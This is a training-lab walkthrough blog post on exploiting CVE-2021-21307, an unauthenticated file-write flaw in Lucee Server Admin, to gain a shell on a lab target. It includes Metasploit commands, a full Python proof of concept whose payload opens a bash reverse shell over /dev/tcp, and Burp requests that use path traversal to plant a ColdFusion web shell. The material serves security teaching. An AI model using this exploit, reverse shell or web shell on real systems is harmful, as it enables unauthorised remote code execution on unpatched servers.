blog
[CVE-2021-21307] Lucee Se ...
14 November 22

[CVE-2021-21307] Lucee Server Arbitrary File Write

Posted byINE
facebooktwitterlinkedin
news-featured

In our lab walkthrough series, we go through selected lab exercises on our INE Platform. Subscribe or sign up for a 7-day, risk-free trial with INE and access this lab and a robust library covering the latest in Cyber Security, Networking, Cloud, and Data Science!

Purpose: 

We are learning how to exploit the Lucee server's vulnerable version using the Metasploit Framework and a Python script.

Technical difficulty: Beginner

Introduction

Lucee Server is a dynamic, Java-based (JSR-223), tag and scripting language used for rapid web application development. In Lucee Admin, before versions 5.3.7.47, 5.3.6.68 or 5.3.5.96 there was an unauthenticated, remote code exploit. This is fixed in versions 5.3.7.47, 5.3.6.68 or 5.3.5.96. As a workaround, one can block access to the Lucee Administrator.

This vulnerability has been assigned the CVE id CVE-2021-21307. The Base CVSS score for this vulnerability is 9.8 Critical.  

Reference: https://nvd.nist.gov/vuln/detail/CVE-2021-21307 

The idea is to take advantage of an arbitrary file written in Lucee Administrator's imgProcess.cfm file.

In this lab, we will learn how to exploit the unauthenticated, remote code execution vulnerability in Lucee Administrator in a realistic environment and leverage it to gain shell access on the target server and retrieve the flag!

Lab Environment

In this lab environment, the user is going to get access to a Kali GUI instance. A vulnerable version of Lucee is running on the target machine. It can be accessed using the tools installed on Kali at http://demo.ine.local:8888.  

Objective: Exploit the unauthenticated remote code execution (RCE) vulnerability in Lucee Admin to gain shell access on the target server and retrieve the flag present in the system's root directory!  

Lucee_Server_Arbitrary_File_Write_0.jpg

Lab Link: https://my.ine.com/INE/courses/ebd09929/cyber-security-vulnerabilities-training-library/lab/7c6514d9-a97a-4298-85bc-838ea4fab901 

Untitled.png

Tools

The best tools for this lab are:  

- Nmap

- Curl

- Python

- A web browser

- Metasploit Framework

Step 1: Open the lab link to access the Kali GUI instance.  

Lucee_Server_Arbitrary_File_Write_1.jpg

Step 2: Check if the provided machine/domain is reachable.  

Command:  

ping -c3 demo.ine.local

Lucee_Server_Arbitrary_File_Write_2.jpg

The provided machine is reachable. 192.52.49.3 is the IP address of the target machine.

Step 3: Check open ports on the provided machine.  

Command:  

nmap -sS -sV demo.ine.local

Lucee_Server_Arbitrary_File_Write_3.jpg

Apache Tomcat 9.0.39 is running on port 8888 on the target machine.  

Step 4: Let's try sending a bad request using the browser.

Command:

http://demo.ine.local:8888/hdshgss.cfm 

Lucee_Server_Arbitrary_File_Write_4.jpg

We notice that a vulnerable Lucee 5.3.7.43 is running on the target machine.

Exploit using the Metasploit module

Step 5: First, check the attacker machine's IP address.

Command: 

ifconfig

Lucee_Server_Arbitrary_File_Write_5.jpg

192.52.49.2 is the attacker machine's IP address.

Step 6: Start the msfconsole and search for the desired module.

Commands:

msfconsole -q

search lucee

Lucee_Server_Arbitrary_File_Write_6.jpg

Step 7: We get the desired module. We will use this module and then see what all options are required. Run the following commands:

Commands: 

use exploit/linux/http/lucee_admin_imgprocess_file_write

show options

Lucee_Server_Arbitrary_File_Write_7.jpg

Step 8: Now run the following commands one by one:

Commands: 

set RHOSTS 192.52.49.3

set LHOST 192.52.49.2

check

exploit

Note that RHOSTS is the target machine's IP address and LHOST is the attacker machine's IP address. And these values may vary for you.

Lucee_Server_Arbitrary_File_Write_8.jpg

We have successfully gained a command shell session.

Step 9: Read the flag.

Commands:

ls /

cat /flag.txt

Lucee_Server_Arbitrary_File_Write_9.jpg

FLAG: 7c5886ace9309cf2d23e6f556c79aa69 

Exploit using Python script

We will use the script available at the following URL:

URL: https://github.com/cyllective/CVEs/blob/master/CVE-2021-21307/poc.py 

The exploit has been provided by [cyllective](https://github.com/cyllective).

Step 10: From the terminal, save the following python code in a file named exploit.py. 

#!/usr/bin/env python3
#
Title: Remote Code Exploit in Lucee Admin
CVE: CVE-2021-21307
Affected: < 5.3.7.47
Software: lucee/Lucee 
Research: 
  * rootxharsh
  * iamnoooob
PoC: cydave of cyllective AG
References:
  * https://github.com/httpvoid/writeups/blob/main/Apple-RCE.md
  * https://github.com/advisories/GHSA-wq6x-g685-w5f2
#
import string
import random
import argparse
import requests
import urllib3
Disable insecure https warnings (for self-signed SSL certificates)
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
ap = argparse.ArgumentParser()
ap.add_argument("-t", "--target", default="http://localhost:8888")
ap.add_argument("-s", "--host", required=True)
ap.add_argument("-p", "--port", required=True, type=int)
args = ap.parse_args()
base_url = args.target.rstrip("/")
def random_string():
    return "".join(random.choices(string.ascii_lowercase, k=12))
payload = f"""\
<cfset args="-c 'bash -i >& /dev/tcp/{args.host}/{args.port} 0>&1'">
<cfoutput>
<cfexecute
    name="bash"
    arguments="#preservesinglequotes(args)#"
    timeout="2">
</cfexecute>
</cfoutput>
"""
with requests.Session() as session:
    img_process_url = f"{base_url}/lucee/admin/imgProcess.cfm"
    response = session.get(img_process_url)
    if response.ok:
        print(f"[-] Target most likely not vulnerable.")
        exit()
    filename = random_string() + ".cfm"
    print(f"[*] Writing payload...")
    session.post(f"{img_process_url}?file=_/" + random_string(), data={"imgSrc": random_string()})
    session.post(f"{img_process_url}?file=_/../../../context/{filename}", data={"imgSrc": payload})
    try:
        print("[*] Triggering shell...")
        session.get(f"{base_url}/lucee/{filename}", timeout=2)
    except requests.ReadTimeout:
        pass

Check what arguments are required:

Command:

python3 exploit.py -h

Lucee_Server_Arbitrary_File_Write_10.jpg

Step 11: Open a second terminal and start a netcat listener on port 5555.

Command:

nc -nvlp 5555

Lucee_Server_Arbitrary_File_Write_11.jpg

Step 12: From the first terminal, run the script along with the required arguments:

Command:

python3 exploit.py -t http://demo.ine.local:8888 -s 192.52.49.2 -p 5555

Note: Remember to change the host IP address (attacker machine's IP address) in the above command as it may vary for you.

Lucee_Server_Arbitrary_File_Write_12.jpg

Step 13: Check the second terminal. The exploit worked and we got shell access. 

Lucee_Server_Arbitrary_File_Write_13.jpg

Step 14: Read the flag.

Commands:

ls /

cat /flag.txt

Lucee_Server_Arbitrary_File_Write_14.jpg

FLAG: 7c5886ace9309cf2d23e6f556c79aa69 

Exploit using Burp Suite

Reference: https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-21307.yaml

Step 15: Start Burp Suite, go to the Repeater tab and paste the following HTTP request. This request will create a directory in */opt/lucee/web/temp/admin-ext-thumbnails* to ensure path traversal.

Request

POST /lucee/admin/imgProcess.cfm?file=/whatever HTTP/1.1

Host: demo.ine.local:8888

Content-Type: application/x-www-form-urlencoded

imgSrc=a

Lucee_Server_Arbitrary_File_Write_15.jpg

Step 16: Click on the pencil icon on the top right corner to configure target details as shown.

- Host: demo.ine.local

- Port: 8888 

Lucee_Server_Arbitrary_File_Write_16.jpg

Click OK and then hit Send.

Lucee_Server_Arbitrary_File_Write_16_1.jpg

Step 17: Replace the request in the repeater with the following and then hit Send. This request will create our malicious randomfile.cfm.

Request

POST /lucee/admin/imgProcess.cfm?file=/../../../context/randomfile.cfm HTTP/1.1

Host: demo.ine.local:8888

Content-Type: application/x-www-form-urlencoded

imgSrc=

<cfoutput>

<table>

<form method="POST" action="">

<tr><td>Command:</td><td><input type=test name="cmd" size=50

<cfif isdefined("form.cmd")>value="#form.cmd#"</cfif>><br></td></tr>

<tr><td>Options:</td><td> <input type=text name="opts" size=50

<cfif isdefined("form.opts")>value="#form.opts#"</cfif>><br></td></tr>

<tr><td>Timeout:</td><td> <input type=text name="timeout" size=4

<cfif isdefined("form.timeout")>value="#form.timeout#"

<cfelse> value="5"</cfif>></td></tr>

</table>

<input type=submit value="Exec" >

</form>

<cfif isdefined("form.cmd")>

<cfsavecontent variable="myVar">

<cfexecute name = "#Form.cmd#"

arguments = "#Form.opts#"

timeout = "#Form.timeout#">

</cfexecute>

</cfsavecontent>

<pre>

#HTMLCodeFormat(myVar)#

</pre>

</cfif>

</cfoutput>

Lucee_Server_Arbitrary_File_Write_17.jpg

Step 18: Now, let's try executing a command. Replace the request in the repeater with the following. 

Request

POST /lucee/randomfile.cfm HTTP/1.1

Host: demo.ine.local:8888

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Content-Type: application/x-www-form-urlencoded

cmd=id&opts=&timeout=5

We are trying to execute the id command here. Hit Send. The exploit worked, and we got a valid response.

Lucee_Server_Arbitrary_File_Write_18.jpg

Conclusion

In this lab, we exploited the unauthenticated, remote code execution vulnerability in Lucee Admin using the Metasploit module, Python script, and Burp Suite. 

References

NVD CVE-2021-21307

Lucee Server

PoC

Try this exploit for yourself! Subscribe or sign up for a 7-day, risk-free trial with INE to access this lab and a robust library covering the latest in Cyber Security, Networking, Cloud, and Data Science!

Need training for your entire team?

Schedule a Demo

Hey! Don’t miss anything - subscribe to our newsletter!

© 2022 INE. All Rights Reserved. All logos, trademarks and registered trademarks are the property of their respective owners.
Terms of servicePrivacy policy
instagram Logofacebook Logotwitter Logolinkedin Logoyoutube Logo